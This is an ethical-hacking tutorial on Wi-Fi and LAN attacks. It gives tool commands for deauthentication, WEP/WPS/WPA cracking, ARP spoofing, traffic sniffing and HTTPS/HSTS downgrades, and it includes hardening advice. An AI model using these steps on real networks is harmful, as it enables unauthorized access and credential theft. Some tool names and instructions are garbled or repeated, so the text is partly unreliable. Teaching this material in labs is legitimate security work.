Ethical Hacking-1

ETHICAL HACKING.
Chapter 1: Network Hacking

Section 1: Introduction.
Hacking has become a part of our day-to-day life.

Hacking is identifying and exploiting weaknesses in
computer systems and/or computer networks.
Cybercrime is committing a crime with the aid of
computers and information technology
infrastructure. Ethical Hacking is about improving
the security of computer systems and/or computer
networks. Ethical Hacking is legal. Here, we are
going to see about the A to Z of ethical hacking.
In this section, we are going to see how to test

penetration testing labs, and how to install the
needed software for safe hacking. There are four
main testing sections in ethical hacking,
1. Network Hacking
2. Gaining Access.
3. Post Exploitation.
4. Website Hacking.
In simpler words, hacking is being able to have

access to other systems, and remote computers that
we can able to have access and gain information
from them. The three types of hackers are
1. Blackhat Hackers: It is illegal, people hack other
systems and demand money.
2. Whitehat Hackers: they only hack systems to which
they have permission. Otherwise called ethical
hackers.
3. GreyhatHackers: It is a combination of both whitehat
and blackhat, this is also kind of illegal.
There is always a doubt in everyone’s mind, Why learn

Hacking and what is its use? It is an existing industry
and hacking has a lot of job opportunities in different
MNCs as there is a huge demand for ethical hackers to
secure the system from black hat hackers.
Section 2: Hacking Lab Setup.
Lab setting:
To proceed with the hacking process, there are a few
prerequisites to be set up in our system answer call it a
lab. To create a lab, we need
Hacking machines: if you are hacking other
machines.
Websites to hack: if you are hacking websites.
Network to hack: if you are hacking networks.
IInstead of setting up all different requirements, you can

do all this on your computer by installing everything as
virtual machines. The daily computers can be used to
install virtualization software such as a virtual box or
VMware.
It allows us to create several virtual computers inside
the main computer. We can even have ten virtual
computers installed on the main computer and can do
everything on a single computer. Using the virtual
machine we can set Kali Linux as the hacking machine
and other two different machines as target machines for
learning and practice. By using VM you will not lose any
functionalities on your main computer. All machines are
going to be isolated and you can gain so many new
features. We will see more about it in the upcoming
modules.
Initial preparation:
The first operating system to install in our lab is Kali
Linux. Using an operating system designed for hacking
reduces our time and effort. It’s a Linux distro based on
Debian, the main difference between Kali Linux and the
original Debian Linux is that Kali Linux has a lot of
hacking testing tools pre-installed and pre-configured.
You can install Kali Linus as both the main machine and
a VM machine but here we are going to download it as a
VM machine. Download Kali Linux from the link:
https://zsecurity.org/download-custom-kali/
Initial preparation:
The first operating system to install in our lab is Kali
Linux. Using an operating system designed for hacking
reduces our time and effort. It’s a Linux distro based on
Debian, the main difference between Kali Linux and the
original Debian Linux is that Kali Linux has a lot of
hacking testing tools pre-installed and pre-configured.
You can install Kali Linus as both the main machine and
a VM machine but here we are going to download it as a
VM machine. Download Kali Linux from the link:
https://zsecurity.org/download-custom-kali/
Download the Kali Linux according to the configuration

of your system, if you have a 64-bit system/32-bit
system download the version accordingly from any
one of the links. While the file is downloading, we have
to check whether the virtualization is enabled or not in
the system. It should be done only if you have
windows/Linux OS because macOS and all apple
computers come enabled virtualization as default.
Before enabling it, should check whether it is already
enabled or not. To check,
→
Go to start Task manager.
→
Click more details performance.
At the bottom of the performance tab, check
virtualization, if the status is disabled, it should be
enabled manually with a few steps.
To enable virtualization,
Reboot your computer.
While the system is turning on again, we should
enter the BIOS settings. To enter the BIOS settings, a
set of keys that should be pressed are given
according to your system.
Press the key that is relevant to your computer. The
BIOS settings window opens
To enable virtualization check for, VT-X, AMD-V,
SVM, and Vanderpool and enable the virtualization
and exit the window.
The computer restarts enabling the virtualization.
Kali Linux as VM on Windows:

Open the zip file of Kali that you downloaded and
extract the file using the 7zip extractor. It will
uncompress the archive file and extract the inside
files.
The extracted file is designed to run inside VMware
as a virtual machine.
In order to run it, the VMware workstation should be
downloaded. The VMware can be downloaded using
the following link
https://www.vmware.com/products/workstation-
player.html
Download the windows version, after the download
is complete, install it as any similar software and
finish the process.
Now we can run the VM in VMware.
Start the VMware. Click on Open virtual machine or
go to player → →
File open→ Select the
downloaded file of Kali in the location. Open the
Vmware VM file and open the single file inside.
If you want to change any configurations like
memory space, processors, Harddisk storage or
network adapter of the Kali virtual machine, you
can go to Edit virtual machine settings to make the
necessary changes.
Once you are ready to run the virtual machine, click
on the “Green play” button to start it.
A login screen appears, enter the login credentials,
Username: root Password: toor
Kali runs on the windows OS and now we can use
it as a hacking machine on the host OS.
If the virtual machine display is too small, you can
adjust the resolution in Settings → →
Display Scale
and adjust it according to your needs.
Kali Linux as VM on macOS:

Uncompressing an archive file on macOS is very
easy. Just double-click on the file, it will
automatically start extracting the file and creates a
directory.
Download the VMware for the macOS version
player.html and register for the free licence with
your details. Verify your account with your email.
Install the VMware and allow access.
Since MacOS is virtualization enabled by default,
just double-click on the Kali Linux VM file.
It will automatically start running in VMware.
Login with the default credentials.
Kali Linux starts running on the host OS.
To turn off Kali, Go to the top of the screen and
select power off and again power off. The virtual
machine will shut down.
On the top, you can see a VMware fusion, if you
click that you can see the VM machines that are
installed.
If you want to modify any settings, you can change
them in settings by right-clicking on the VM
machine.
Kali Linux as VM on Linux:

Uncompress the download Kali archive file by
right-clicking on it and selecting extract here.
The downloaded file after extraction will
automatically create a directory.
Download VMware of the Linux version
player.html
To install the software, go to the terminal. Change
the working directory to where the VMware is
downloaded using the command cd..
Before running the VMware, its permissions should
be changed to unexecutable. To do that, type the
command chmod +x filename on the terminal.
Now we should install the build-essentials, for that,
type the command sudo apt-get update
Enter the password and click enter.
Once the sources are updated, give the command,
sudo apt-get install build-essentials
The build essentials will be installed. After the
essentials, to install the VMware use the command
./filename
It should be run as admin, so give, sudo./filename
The VMware gets installed as normal software.
Finish the process.
Start the VMware. Click open virtual machine or
File → Open VM → select the Kali file from the
downloaded location.
It will be imported into VMware.
To start it, click on power on.
If a warning popup window opens, click on the
option I copied it.
If an update popup window opens, click on the
options you need.
Login with the credentials.
Now Kali Linux is installed on our main host OS.
Section 3: Basics of Linux.
Basic overview:
1. Left top corner of the status bar
It has two options Application menu and places. The
application menu contains applications categorized as
information gathering applications, vulnerability
analysis, web application analysis, reverse engineering,
etc.,
The places option shows the most common place
visited in the system. It’s more of a shortcut so that you
can access the files from there.
2. Right top corner of the status bar
The right corner contains workspaces and the other
icons. Linux by default comes with different workplaces.
You can work in many workplaces at the same time. As
many workplaces as you’re using, Linux keeps creating
new workplaces. The shortcut to switch between
workplaces is ctrl+alt+up/down
The last icon has various options like sound control and
the list of connections available and the connected
network. In Kali, only external USB adapters can be used
for wifi and not built-in wifi cards. Kali should have an
internet connection for usage. There are also battery
and user settings.
3. Application bar
It has a list of application icons that are regularly used
and if you expand the bar you can have a view of all
applications.
Terminal and Linux commands:

Linux terminal is very powerful than other terminals, as it
can do anything. There’s a command for anything and
everything in Linux. Here are a few commands of Linux.
The website explainshell.com and bs used to learn
about the description and usage of the Linux
commands.
Section 4: Network Hacking
Network penetration testing:

Everything is connected to a network whether the
personal computer or server or website you take as a
target network. When we connect to an internet
connection it is connected to a network. So it is
important to know how a network works. There are three
subsections in network penetration testing.
1. Pre-connection attacks: Here you will learn about all

the attacks one can do before connecting to a
network.
2. Gaining access: Here you will learn about how to
crack wifi keys and gain access to the wifi networks.
3. Post-connection attacks: Here you will learn about
the number of powerful attacks that will allow you to
intercept and capture everything including
passwords, URLs, chats and etc., This applies to
both wifi and wired networks.
Basics of Network:
A network contains a number of clients connected to
each other and clients connect to a network to share
resources. We are often connected to resources to
access internet. For eg., consider your personal wifi, it
has a router, which is the common server. It is called an
access point. The server/router/access point is the only
device that has access to the resource, the resource is
nothing but the internet we are connected to. The
connection to the internet is only through the access
point.
For eg., if you connect your computer to the internet

and open google.com, your computer sends a request
to the access point. The access point has access to
the resource. So it looks for google.com in the
resource and when it receives it, it will forward it to the
response of your computer. This is how your wifi
works and only the access point/server has direct
access to the resource. The only way for any computer
to access the internet is to go through the access
point.
Now the data is transformed between the client and
the access points as packets. The series of packets
are travelled as requests and responses. In wifi
networks, these packets are transmitted in the air.
Therefore, if you have a wireless card and within
range, you can be able to capture these packets.
Connecting a wireless adapter to Kali:

This module is more on how to connect to a network
to a virtual machine. There are a few requirements for
a wireless adapter to connect to the virtual machine.
Here are the requirements for a wireless adapter,
1. Monitor mode
2. Packet injection
3. Ap mode
Recommended chipsets:
1. RealTek RTL8812AU
2. Atheros AR9271
When it comes to an adapter, the brands are
irrelevant. You can go with any brand that has any of
these two chip sets as long as it is supported by the
Kali because these chipsets are the brain of the
adapter. To connect the adapter to the virtual
machine,
Start the VMware. Right-click on the Kali machine
and open settings.
→ →
Click on Add USB controller Finish.
In the USB compatibility, set it to USB 3.1
Check the “Show all USB devices” check box and
click ok.
Before connecting to Kali make sure you are
disconnected to the wireless adapter you already
connected to your computer.
Start Kali and log in.
Open the terminal and run the command, ifconfig.
This command lists all of the network interfaces
connected to this computer. It shows only the
default interfaces as of now.
Now connect the USB to your computer. A popular
window appears. Select the “connect to the virtual
machine” option and select the virtual machine to
which you are connected and click okay.
If you run the same command, ifconfig again, it
will show the interface of the USB adapter you
connected.
Changing MAC address:
Open the terminal and type the command,
ifconfig.
The list of the available network appears. The first
two networks eth0 and l0 are the default network
by Linux and the wlan0(in here) is the wireless
adapter you connected.
The ether configuration in thewlan0 is the MAC
address of your network.
The ether configuration is what should be
changed in order to change the MAC address of
the wireless adapter.
To change the value of the MAC address, the

interface should be disabled first. To disable, use
the command,
ifconfig interface_name down
If it runs with no error, it means it got executed.
Next, we want to change the necessary option of
the particular interface. i.e. The Ether
To change the ether,
ifconfig interface_name hw ether
the_address_you_want_to change_into
After changing the options of the interface, the

interface should be enabled again.
To enable,
ifconfig interface_name up
If you run ifconfig again the network lists appear
with the newly changed MAC address of your USB
adapter.
Remember the MAC address will go back to its
original address when you restart the computer
because we are only changing the address in the
memory and not the actual physical address.
Wireless modes:
Whatever you do with the internet, it is always sent
in packets from your computer to the access
point. It will travel from the source MAC to the
destination MAC.
Since these packets are sent via air, if you are
within the range you will be able to capture the
data without even being the destination MAC.
To do this, you need to change the mode of
operation of your wireless interface to operate in
monitor mode.
Go to the terminal and run the command, iwconfig
This command only shows the wireless interfaces
and its default mode is “Managed”
It means the device can only capture packets that
have the destination MAC address that is directed
only to the Kali machine.
So this mode should be changed to access the
packets. Before changing any option of your
interface, the interface should be disabled.
To disable the interface.
ifconfig interface_name down
Now before changing the mode, run a command
that will kill the interferences the interface will
face while running in the monitor mode.
Run the command,
Airmon-ng check kill
Now to enable monitor mode, use the command,

Iwconfig interface_name mode monitor
After changing the mode, enable the interface with
the command,
ifconfig interface_name up
The mode is changed to monitor and now we can
capture any packets that are directed to any
destination MAC within the range.
Also, note that not all adapters support monitor

mode, so make sure the adapter you use
supports it.
Section 5: Network Hacking-pre connection attacks
Packet sniffing:
Now that we are connected to the monitor mode, we
can capture the packets that are not directed to your
computer. For that, we need a program to complete
the process. The program we are going to use is,
Airodump- NG
The It’s a packet snippet and it is designed to capture
packets while you are in monitor mode. It allows you
to see all the wireless networks around and show
detailed information about the MAC address, its
channel, its encryption and even the clients connected
to this network. Let’s see how to use it.
Go to the Kali virtual machine and enable the

monitor mode in the terminal.
To run the program, use the command,
Airodump-ng interfacename_inmonitormode
It will start working and discovering all the

wireless networks and displaying information
about them.
To stop the program, click ctrl+c
ESSID: names of the wireless networks around
BSSID: shows the MAC address of the target
networks.
PWR: signal strength of the network
Beacons: frames sent by the network in order to
broadcast its existence.
#Data: number of data packets/data frames
#S: number of data packets we collected in the last 10
seconds.
CH: channel that the network works on.
MB: the maximum speed supported by the network.
ENC: encryption used by the network
CIPHER: cipher used in the network
AUTH: Authentication used on that network.
You will know more about ENC, CIPHER & AUTH in the
upcoming sections.
Wifi bands- 2.4Ghz and 5Ghz frequencies:

The bands of the network define what frequency
can be used to broadcast a network. It also
defines the frequency that the clients or
computers be able to support to use to be able to
connect to the network. The two main frequencies
used in wifi networks are 2.4 and 5 Gigahertz.
The airodump-ng program by default only picks up the
network with 2.4 GHz. So it does not provide all the
available networks around. In order to make the
programmed pickup 5Ghz channel, use the command,
Airodump-ng –band a interface_name
Here ‘a’ is the band argument for 5Ghz. Now, all the
networks including the 5Ghz network will be available
in the list.
You can also multiply specific bands using the band

argument.
Airodump-ng –band abg interfacename
Here, abg is the bandwidth for capturing the data of
both 2.4 and 5 Ghz at the same time.
To do airodump like this, you need a power adapter

and it will be slightly slower than only sniffing one
band. This band abg might take a longer time to
provide results, but you’d be able to capture all the
data sent over both 2.4 and 5 Ghz.
Packet sniffing targetted network:

In this module, we are going to see how to packet
sniff a target network. For eg., consider a target
network from the list in the above picture. Since we
know what the target network is and some basic
information about it, let's airodump it. We can gather
more information about it. Use the command,
Airodump-ng –bssid bssid_ofthenetwork –channel
channelnum
–write filename interfacename
The file is to save the captured data. Now, this
command shows only the specified network and its
data.
This is the list of the client devices that are connected

to the specified network in the above-mentioned
command.
Station: MAC address of the devices
PWR: signal strength
Rate: speed of the network
Lost: the amount of data lost
Frames: the number of frames/packets that we
captured
Probe: name of the network if any of the devices are
looking for any other networks
By ending this, new files in your current working

directory will be created with the data we captured. To
list all the files in the current directory, give the
command ls
Here four files named test are created with different
extensions. Airodump automatically added -01 to the
filename so remember to use the same file name for
future use. The file test-01.cap contains all the data
we captured during the process. It contains the URL,
username, password, and chats of all the devices
because to do anything on the internet they have to go
trough the router.
But here the packets are encrypted, because the

network uses encryption, so we could not see the data
in the packets. (you can find that the packets are
encrypted with the code WPA2 in the ENC column) If
it’s an open network you can easily see all the data
from the captured packets. In the next section, you
will learn how to break encryptions and gain access.
Deauthentication attack:
This attack allows us to disconnect any device from
any network before connecting to any of these
networks without even knowing the passwords to the
network. To do this, we are going to pretend like the
client network by changing the MAC address of the
client. Followed by pretending the router MAC address
is our address until the device is disconnected. For
this, the command airplay-ng is used.
Go to the terminal and give the command,
Airplay-ng –deauth numberofthe_deauthpackets –a
MACaddress_oftargetnetwork –c
MACaddress_oftheclient interfacename
In the number of deauth packets, give a really long

number so that it keeps sending requests to both the
router and the target device and the connection is
disconnected for a longer time.
This command will disconnect the target device from

only the specified client network. Only after quitting
the airplay command, the target device will be able to
connect back to this network. If there are any
available networks with known passwords the device
will automatically connect to them after disconnecting
from this network.
Section 6: WEP Cracking.
In the previous sections, everything can be done

without the need of connecting it to the target
network. Now in the upcoming sections, it will be
more about connecting to the target network and
capturing all the data from the device. In this section,
we will learn about how to break the encrypted target
networks and gain access to whether they use
WEP/WPA/WPA2 networks. Once we get the key, we
can be able to connect to the network.
WEP Encryption cracking:

WEP-Wired equivalent privacy is old encryption and it
is simple and can be easily broken. WEP uses an
algorithm called RC4 to encrypt the sent data packets.
Working:
If a client sends something to the router. For eg., text.
The transmitter will encrypt the text using a key and
convert the normal text to gibberish. This encrypted
packet will now be sent to the router via air. And if a
hacker captures the packet now, it will be full of
gibberish as we saw in the previous sections.
The access point will be able to change the
encrypted message as it has the key. The same
procedure happens when the router wants to send
the message. The RC4 algorithm is the best but
the problem is with the implementation.
WEP generates a unique key to each packet when
sending it to the router. To do that initializes a
random 24bit initialization vector. Then this
initialization vector is added to the password.
People use it to connect o the network.
This generates a key stream and this is what
encrypts the data packet. Before sending the
packet to the air, the WEP appends the
initialization vector as plain text because the
router will be able to decrypt the packet only with
the key and the IV.
When the packet reaches the router, with the key
and the IV, the router generates a keystream and
transforms the gibberish into the actual text.
Weaknesses of WEP algorithm implementation:

The Initialization vector is too small, only 24 bits.
Since the IV is added to the encrypted packet
again, if the packet is captured, the hackers will be
able to read the IV as it is sent in plain text format.
If the network is busy, the IV will be repeated
making the WEP vulnerable. This can be used to
find the keystream and decrypt the data.
WEP cracking:
In order to crack WEP, we need to capture a large
number of packets or IV’s because they will be
repeated and the tool airdrop-ng can be used to
crack the key with the IV. To capture the data, use
airodump-ng as per the previous section. And to
analyze the captured IV, we use aircrack-ng.
Go to the terminal and connect the adapter in
monitor mode and run airodump-ng only on the
target network. The target network should be a
busy network that sends a lot of packets.
After running airodump list the files of the current
working directory. To crack the key, use the
command,
aircrack-ng filename
The key is found from the IV. Now, we can

connect to the target network with the ASCII
password and the key.
Copy and paste the key in the terminal and remove
the colons between the numbers.
Now, in your host machine, connect to the target
network and in the password tab, paste the key
copied.
Now, we break the encryption and are connected to

the target network.
Fake authentication attack:
During the cracking of WEP, it is mentioned that
the network should be busy, but if the network is
not busy then the number
36.1 of data will increase
slowly and it increases our waiting time.
The solution to this is to force the access point to
generate new packets with new IVs. To do this,
associating with the network is important because
access points deny requests from clients that are
not associated with it.
Remember, this is not connecting to the network
but letting the network know that we want to
communicate with it. For eg., clicking the wifi
network to connect, before entering the password.
1. Go to the terminal and run airodump-ng against
the target network.
2. To associate with this network we are going to
use the program aireplay-ng
Aireplay-ng –fakeauth 0 -a bssid_ofnetwork -h
MACaddress_ofadapter adapter name
0: to do this process only once

-a: to specify the MAC address of the target network
-h: to specify the MAC address of the wireless adapter
3.To get the MAC address of your adapter, run ifconfig
in another terminal. The first 12 digits of the unspec
code are your MAC address.
4. Replace the - in the address with : and run the

command. Before running the command the auth
column will be empty and after running it will be in the
status opened with new clients.
5. Now we are associated with the target network and

communicate with it.
ARP request replay attack:
Since we are associated with the network, we can
now force the network access point to increase
the number of packets quickly.
It will allow us to crack WEP networks even if they
are not busy.
The most reliable method to do this is using an
ARP request replay 36.1 attack. It will work against
most networks if you have a good signal and a
good wireless adapter.
Here the process is to,
1. Wait for an ARP packet, it's a special kind of
packet(will learn more about it on the upcoming
sections)
2. Capture it and retransmit it, by doing this the
access point will produce more packets with a
new IV.
3. Once we have enough IVs the program aircrack-ng
can be used to crack the key.
4. Continue from the last process you did. i.e.,
associating with the network.
Use the command,

aireplay-ng –arpreplay -b bssid_targetnetwork -h
MAC_adapter adaptername
It is very similar to the fake authentication
command, but instead of fakeauth, arreplay attack
is used.
Now, the program is waiting for an ARP packet,
once it is transmitted, it is going to capture and
transmit it.
Wait for some time and while the number of data
keeps increasing it means we captured on the
ARP packet.
Before running the aircrack-ng associate with the

network one more time. To aircrack,
aircrack-ng filename
After running, the command finds the key. The

target network is cracked even without sending
data just by forcing the AP to generate new
packets.
Section 7: WPA/WPA2 Cracking
Here, you will learn about cracking WPA and WPA2

networks. Both techniques are very similar, except for
the difference in encryption integrity. These
techniques came into existence after acknowledging
the weaknesses of WEP. So, they are more secure and
cracking them is challenging.
Before knowing to know how to crack the network, it

is essential to know about a feature that can be
exploited to recover a key without having to crack the
encryption. The feature is called WPS.
It allows the devices to connect to the network

easily.
The authentication of WPS is done with only an
8pin number, which makes the process easy with
less time.
To do this, initially WPS should be enabled on the
network and needs to be misconfigured. This
method will not work if push button
authentication(PBC) is enabled.
WPA/WPA2 hacking without wordlist:
Open the terminal in the Kali machine with monitor
mode enabled.
In the previous section, the airdump-ng command
is used to see all the networks around us, but now
we need only the networks that are enabled.
To do that a tool called a wash is used,
Wash –interface interfacename
This command will list the networks.

Now that we know the target uses WPC, there is
a higher chance that this attack will work. It only
fails if the target network uses PPC, because it
will refuse all the pins unless the button is
pressed.
First, associate with the target network using a
fake authentication attack, because that’s when
the network will start to accept the pin.
Use the command used for WEP. Before running
this command open another terminal and run the
program reaver which acts as a brutal force and
gives the 8-digit pin, only after this network
should be associated otherwise it will fail.
Run the program,
Reaver –bssid bssid_oftarget –channel
channel_oftarget –interface adaptername –v –no-
associate
–v: to show more information
–no-associate: to tell the reaver not to associate
with the target as we are doing it manually.
Now associate the target network in the previous
terminal.
After associating the reaver program runs and
finds the pin
With this pin, we can connect to the network and
see and decrypt all the packets in the air.
Capturing the handshake:
If the WPS use PSB then the actual WPA should be
cracked. The same method used in WEP cannot be
used to crack WPA/WPA2, because the keys are
unique and temporary, so the packet contains no
information. The packets that contain useful
information are the handshake packets. These are
four packets sent between the clients and the router
when a client connects to the network.
Run airodump-ng for all the networks around.

Copy the MAC address of your target network.
Initially run airodump-ng for the network and
save it in a file as we did for WEP.
The airodump-ng starts running, now wait until

the handshake packet is captured.
Alternatively, we can also use the de-
authentication attack to disconnect the client
from the network, so that the client will
automatically connect once the attack is
stopped. This way we can save our waiting
time.
Once the client is connected again, the
handshake packet is captured.
Now the data is saved in the file given.
Wordlist creating:
The handshake packets do not contain any
information that will help us crack the WPA key. It
only helps us to check whether the password we
enter is valid or not. So we are going to create a
wordlist that will have various combinations of
passwords. Then these passwords can be used with
the handshake packets for checking. To create a
wordlist, a tool called crunch is used.
Crunch [min] [max] [characters] -t [pattern] -o

[filename]
Crunch: name of the tool

[min][max]: minimum and maximum number of
characters for the password to be generated.
[charcters]: characters that you want to generate
passwords from.
-t: to give a pattern. It is optional to use.
-o: to specify the filename where the passwords
should be saved.
You can learn more options of crunch with the

command, man crunch
The crunch has generated 484375 passwords which
are stored in the text file. Open the file using the
command, cat filename
Cracking WPA/WPA2
With the wordlist created we are going to crack the
WPA2 with the handshake packet. The aircrack-ng
will unpack the handshake packet and derive useful
information. The message integrity(MIC) in the
handshake packet is the tool that is used to verify
the password.
The MIC of the handshake packet is separated

and the other information in the packet is
combined with the first password in the wordlist.
Then the combination creates other MIC. The
newly created MIC is checked with the already
existing MIC in the packet.
If both the MICs match then the password is
correct, if not it moves to the next password and
the steps get repeated.
If both the MICs match then the password is
correct, if not it moves to the next password and
the steps get repeated.
It does the checking for all the passwords in the
wordlist until the correct password is found.
Run the aircrack-ng command to crack the
password,
Aircrack-ng handshake_filename -w
wordlist_filename
Aircrack-ng runs the wordlist with the handshake

file, testing each password in the wordlist.
The speed of this process depends on the

processor. After running through all the
passwords in the wordlist, the correct password
will be shown with the key found message.
Section 8: Securing your device
To secure your network from hackers,

1. Avoid using WEP encryption as it is easy to
crack.
2. Use a WPA2 network with a complex password.
3. Make sure that the WPS feature is disabled in
your network.
Configuring wireless settings:

Run the command, ip route, it shows the default
gateways in the current network.
With the IP address of the default gateways,

necessary changes can be done in the network
settings.
Copy the IP address paste it into the web
browser and click enter.
Login with your network credentials and once
logged in make the changes as follows,
1. In the wifi, settings make the network invisible
so it does not broadcast.
2. The security should be WPA2 personal for
maximum security.
3. The password should be long, change it if it is
not.
4. Then if the WPS authentication tab is enabled,
disable it and apply the changes.
5. By doing this, the router will restart with the new
settings.
6. If you cannot connect to your wifi networks you
can connect using an ethernet cable and this
way deauthentication attack will work against
you.
Section 9: Post-connection attacks
Post-connection attacks are attacks that can be done

after connecting to the target networks. To do post-
connection attacks and gather information or
intercept data, there are two options,
1. Run the attacks against the virtual NAT network
against the windows machine. Just make sure
that the virtual window machine is connected to
the same network as the Kali machine.
2. Run the attacks against real computers connected
to real wifi networks. Make sure that a wireless
interface is connected to the Kali machine and
that the Kali machine is connected to the target
network.
Install windows as a virtual machine:
To practice hacking and doing attacks, it is
recommended to have the target machine as a
virtual machine because it is easy to fix if something
is broken. Microsoft has already released many
virtual machines that can be downloaded for free
from Microsoft. Here is the link for downloading:
https://developer.microsoft.com/en-us/microsoft-
edge/tools/vms/
Open the link.

Select MSEdge on Win10(x64) stable 1809 on
the virtual machine tab.
SelectVMware on the VM platform and
download the zip file.
After downloading uncompress and extracting
the file. Once the file is extracted, open VMware.
Go to File → open → select the extracted
windows file and click open.
Change the name of the file if needed and click
import.
Beforeimporting you can change its memory
because it needs only less memory.
Start it by clicking the play button.
Login and enter the default password, Passw0rd!
and hit enter.
Now the complete windows VM is installed
inside the host machine.
Discovering devices from the same network:
Information gathering is an essential step when it
comes to hacking or penetration testing. You cannot
gain access to a system if you don’t know any basic
information about it.
For eg., consider you are connected to a network
and one of the devices connected to that network is
your target. So initially you need to discover all of the
clients connected to that network and gain their
MAC address and IP address. There are programs
like Net discover and Enmap to do this and save you
time. Let’s see how to use NetDiscover to map to all
the clients of the network you are connected to.
Run the command, ifconfig, to get your IP address

and then use the net discover program,
netdiscover -r yourIPrange
You can only access IPs under the same subnet of
yours. An IP of a range can start from 10.0.2.1 and
ends at 10.0.2.254 as 254 is the last IP a client can
have. 10.0.2.1/24 is a simpler way of specifying the
whole IP subnet.
This command will show all the IPs of the devices

that are connected to the same network and the first
three parts of the IPs are always the same as they
are from the same subnet. Press q to quit the
program.
Gathering information about connected devices:

Nmap is a bit slower than NetDiscover but takes
scanning to a different level and shows more
information about the target. If you are in a network
you can see more about the connected devices and
you will be able to bypass security and firewalks too.
Zenmap is the graphical user interface of Nmap and
let’s see more about it.
Type the command zenmap and click enter. The

zenmap interface opens.
In the target input box, you can scan any IP within
your reach. You can also enter a range like
Netdiscover and it will scan the whole range. As
soon as you enter the target, the nmap command
will get automatically filled in the command input
box.
It will run the nmap command in the background

and show the results. You can also copy and paste
the command in the terminal, it gives the same
result.
The nmap command has various profiles that will
work at different speeds.
1. The ping scan
It’s a very quick scan, it pings all the possible IPs in
the range and when it gets a response, it records it
and shows us the devices with their MAC address
and the vendor. But a lot of networks will not
respond to the ping scan so it may not be included in
the list.
2. The Quick scan

It is slower than the ping scan but it shows more
information than the ping scan. It shows the open
ports of the devices and the services running on the
devices.
3. The Quick scan plus
It is slower but it takes the quick scan one step
further and shows us even more information
1. We can see the operating system running on the
device.
2. The device type(Phone/Laptop/Tablet)
3. The program and its version run on its ports.
In the quick scan, we got the open ports but didn’t

know the program running on them. Getting to know
the running program is helpful to exploit vulnerable
services and gain full control that has these
services.
The icons before the IP address are the type of OS

on the devices. It now shows the version of the
posts and the device types with the versions we can
know its vulnerabilities. In the services tab on the
left corner, we can distinguish the devices based on
the services running.
Section 10: Post connection: MITM attacks
ARP poisoning:
MITM is man-in-the-middle attacks, these attacks
can be launched only if we can intercept the
communication between two devices. Usually, the
client contacts the resource/Internet. In this
process, attacking in the middle of the contact and
gaining access to the data shared is called the MITM
attack. There are a lot of methods to do this, here,
we are going to learn about ARP attacks. It allows us
to redirect the flow of the packets. Any packets or
responses sent would be made to flow through the
Hacker’s computer. This allows the hacker to read,
modify or drop the data.
ARP- Address resolution protocol is a very simple

protocol that allows us to link the IP address to the
MAC address. The hacker system sends a request to
all the clients connected to a network, asking for the
specific IP address. The client with that IP address
sends a response to the hacker system. Now, the
hacker system changes its IP to the gained IP
address of the client. Now, the victim client thinks
that the hacker system is the router and the router
thinks that the hacker system is the victim client.
We can do all this because ARP is not secure and
clients can accept responses even if they did not
send a request and did not verify it.
Network traffic interception:

To intercept the network, there is a number of tools
to run an ARP spoofing attack. A tool called ARP
spoof and bettercap is a simple and reliable tool that
is used. ARP can be ported to many operating
systems including IOS and Android and bettercap
has many features compared to ARP. In this module,
the working and features of ARP are covered.
Syntax of ARP:
Arpspoof -i [interfacename] -t [clientIP] [gatewayIP]
Run the same command in another terminal with the

gateway address as the target address.
arpspoof -i [interfacename] -t [gatewayIP] [clientIP]
The first command is for making the victim believe

that we are the router. The second command is to
make the router believe that we are the victim. Since
this system is not a router, it doesn't allow packets
to flow through it. To make the packets flow, port
forwarding should be done. To port forward,
If the command runs without any errors, it means
the packet flow has been enabled.
Basics of bettercap:
Bettercap can be used for what we did with ARP
spoof and much more. It can be used to capture
data, analyze it, see usernames and passwords, can
be used to bypass HTTPS and potentially bypass
HSTS.
Syntax to start bettercap:
Bettercap -iface [interfacename]
We are now inside the tool with a different command

prompt. To know about the commands and modules
of bettercap, use command help, and to know more
about a specific command or module type,
help [command/modulename]
To identify connected devices in the network quickly,

the command,
Net.probe on is used. It shows all the connected
devices in the network.
With the command net.show you can see more
information on the connected devices.
ARP spoofing using bettercap:

By spoofing using bettercap allows our computer in
the middle of a connection and encrypt data and
how read the data they are sending. To spoof both
the target and the router, the command
arp.spoof.fullduplex is used. But by default, it is set
to False. Only if it is true we can spoof both the
target and the router otherwise only the target
machine will be spoofed.
Now to change the option of the module in bettercap

the below syntax is used,
Set [modulename] [optiontochange]
If you didn’t get any error it means it is changed.
Next, the target should be changed to our target
machine’s IP.
As the changes are made as expected, the tool can

be used now. Initially, turn the arp.spoof on
Spying on network devices:

Now, we are in the middle of a connection and all the
data are flowing through our computer. So, now a
program is needed to capture these data. A module
that comes with bettercap is going to be used to
capture the data. The command is, net.sniff
Now, everything will be captured and analyzed by the

Kali machine including the URLs, websites visited,
usernames and passwords.
Custom spoofing script:
Every time you have to intercept daa, you need to do
all the steps mentioned in the previous modules
such as net probe on, turning arpspoof on, changing
its options and doing net sniffing. But you can also
make it do automatically using a text file that has all
the commands to be run. Enter all the commands in
a text file and save it.
Now we have to feed this file to the bettercap to

automatically do the commands,
Bettercap -iface [defaultinterface] -caplet
[capletfilename]
Now, if you give help, you can see the modules

running automatically from the file.
If you check the connections in your host machine
with the command,
arp -a, you can see that the MAC address of the
target machine has been changed to the address of
the Kali machine.
HTTPS bypass:
The data interception we did in the previous
modules will work only with HTTP because it sends
data in plaintext. That’s why a MITM can read all the
data. To overcome this, HTTPS was created. It adds
an extra layer to the data HTTP sends, which makes
the data into gibberish. So even if the data is
captured it cannot be read by anyone.
HTTPS use Transport Layer Security(TLS) and
Secure Sockets Layer(SSL) to encrypt the data and it
is very difficult to break. So to bypass this the
HTTPS connections should be downgraded to HTTP.
Since we are the MITM now, we can change the
target requests of HTTPS and give them the HTTP
request. To do this, we have to configure a tool
called, SSL strip.
Open the text file we used to store the commands in

the previous module and add one more command
that will make the bettercap think that the
passwords sent by the target are sent from our
computer.
Go to the terminal and run the caplet command.
Bettercap comes with several caplets and to see all

the caplets with their location you can use the
command, caplets -show
To run any of these caplets, you just have to give its
name and it will run automatically. Go to your host
machine and run some websites and see whether it
is reflected in the Kali machine. This method will
work on almost all website that uses HTTPS except
some that use HSTS, which is a little trickier to
bypass.
HSTS bypass:
In the previous module, we saw that we cannot
intercept HSTS websites, it is because modern
websites by default come with a list of websites that
only should load over HTTPS. IN HSTS, the browser
knows that the website should only be loaded as
HTTPS & accepts it only if it comes back to HTTPS.
As a MITM, we cannot do anything about it as the
browser checks it locally with the list that is stored
on the computer itself.
The only solution to bypass HSTS is to make the
browser think that it is loading another website. To
do this, all HSTS links should be replaced with
similar links, but not the exact links. For eg.,
Facebook.com as Facebook.corn
As seen in the previous modules, the bettercap

caplets are stored as files in the root directory and
they can be used to run automatically.
